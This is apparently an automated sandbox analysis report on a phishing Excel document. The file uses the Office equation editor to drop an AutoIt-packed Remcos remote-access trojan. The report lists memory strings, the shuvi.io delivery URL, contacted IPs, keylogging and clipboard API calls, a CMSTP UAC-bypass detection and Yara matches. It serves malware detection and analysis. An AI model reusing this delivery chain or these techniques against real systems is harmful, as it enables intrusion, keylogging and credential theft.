Source: bhv35FF.tmp.13.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
Source: bhv35FF.tmp.13.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
Source: bhv35FF.tmp.13.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: bhv35FF.tmp.13.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
Source: bhv35FF.tmp.13.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
Source: bhv35FF.tmp.13.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: bhv35FF.tmp.13.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
Source: bhv35FF.tmp.13.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
Source: bhv35FF.tmp.13.dr	String found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
Source: bhv35FF.tmp.13.dr	String found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
Source: svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.464109574.0000000001D79000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: svchost.exe, 0000000F.00000002.463895380.00000000001DC000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com/S
Source: svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: bhv35FF.tmp.13.dr	String found in binary or memory: http://www.msn.com/
Source: bhv35FF.tmp.13.dr	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: bhv35FF.tmp.13.dr	String found in binary or memory: http://www.msn.com/advertisement.ad.js
Source: bhv35FF.tmp.13.dr	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: svchost.exe, 0000000D.00000002.467921215.0000000000184000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.netXB
Source: bhv35FF.tmp.13.dr	String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: bhv35FF.tmp.13.dr	String found in binary or memory: https://contextual.media.net/
Source: bhv35FF.tmp.13.dr	String found in binary or memory: https://contextual.media.net/8/nrrV73987.js
Source: bhv35FF.tmp.13.dr	String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
Source: bhv35FF.tmp.13.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: bhv35FF.tmp.13.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: bhv35FF.tmp.13.dr	String found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
Source: bhv35FF.tmp.13.dr	String found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
Source: bhv35FF.tmp.13.dr	String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
Source: bhv35FF.tmp.13.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv35FF.tmp.13.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: bhv35FF.tmp.13.dr	String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: bhv35FF.tmp.13.dr	String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: shuvi.io.url.4.dr	String found in binary or memory: https://shuvi.io/
Source: PO-00006799868.xls, 7al0eY.url.4.dr	String found in binary or memory: https://shuvi.io/7al0eY
Source: 68730000.0.dr, ~DFF2F9DC4D2772FBCE.TMP.0.dr	String found in binary or memory: https://shuvi.io/7al0eYyX
Source: bhv35FF.tmp.13.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
Source: svchost.exe, 0000000D.00000003.467821156.0000000000525000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/
Source: svchost.exe, 0000000D.00000003.467821156.0000000000525000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_fl
Source: svchost.exe, 0000000D.00000003.467652223.0000000000525000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: bhv35FF.tmp.13.dr	String found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
Source: svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: bhv35FF.tmp.13.dr	String found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033

Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.2

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_0022407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

10_2_0022407C

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_0022427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		10_2_0022427A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012D427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		11_2_012D427A

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

10_2_0022407C

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_0021003A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

10_2_0021003A

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_0023CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		10_2_0023CB26
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012ECB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		11_2_012ECB26

Source: Yara match	File source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.485970456.0000000000604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96632497.doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat[1].doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: This is a third-party compiled AutoIt script.	10_2_001B3B4C
Source: taskhostw.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: taskhostw.exe, 0000000A.00000000.449366301.0000000000264000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_5b2b7944-a
Source: taskhostw.exe, 0000000A.00000000.449366301.0000000000264000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"	memstr_6a25fbd7-c
Source: taskhostw.exe, 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_eebce20b-8
Source: taskhostw.exe, 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"	memstr_2f9914ac-8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: This is a third-party compiled AutoIt script.	11_2_01263B4C
Source: name.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: name.exe, 0000000B.00000000.453360398.0000000001314000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_75c37f58-d
Source: name.exe, 0000000B.00000000.453360398.0000000001314000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"	memstr_59c41405-a
Source: name.exe, 00000011.00000002.486104935.0000000001314000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_5afa77ec-9
Source: name.exe, 00000011.00000002.486104935.0000000001314000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"	memstr_d36cde13-4
Source: name.exe.10.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_989c10cc-0
Source: name.exe.10.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"	memstr_636673e6-7
Source: taskhostw.exe.9.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_c863ee33-e
Source: taskhostw.exe.9.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"	memstr_e887e63c-4
Source: taskhostw[1].exe.9.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_dcf847ce-b
Source: taskhostw[1].exe.9.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"	memstr_044667a8-4

Excel sheet contains many unusual embedded objects

Source: PO-00006799868.xls	OLE: Microsoft Excel 2007+
Source: PO-00006799868.xls	OLE: Microsoft Excel 2007+
Source: 68730000.0.dr	OLE: Microsoft Excel 2007+
Source: 68730000.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\7al0eY.url			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\shuvi.io.url			Jump to behavior

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\taskhostw.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\taskhostw[1].exe			Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID

Jump to behavior

